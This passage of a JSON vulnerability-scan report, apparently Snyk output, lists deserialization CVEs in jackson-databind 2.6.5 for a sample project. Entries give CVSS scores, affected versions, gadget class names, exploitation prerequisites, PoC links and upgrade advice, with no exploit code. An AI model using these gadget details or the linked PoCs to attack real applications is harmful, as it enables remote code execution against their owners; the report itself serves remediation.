"vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - 
"filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2660", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVE's Blog" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-10673", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:45.907430Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10673" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - 
"GHSA-fqwf-pjwf-7vqv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T14:36:02.644920Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:21Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.167932Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - 
"className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2659", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVEs: Don’t Panic" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:35.299190Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model 
for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10672" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-95cm-88f5-f2c7" - ] - }, - "packageName": 
"com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T15:03:20.847507Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:24Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.920721Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": 
"com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2642", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.137266Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of 
Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10969" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-758m-v56v-grj4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T16:25:31.113677Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": 
"2020-03-26T14:55:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:31Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.582959Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2662", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.826605Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-rf6r-2c4q-2vwg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T17:09:01.709397Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-26T14:55:20Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:20Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.576513Z", - "socialTrendAlert": false, - 
"severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2670", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-11113", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "cvssSources": [ - { - 
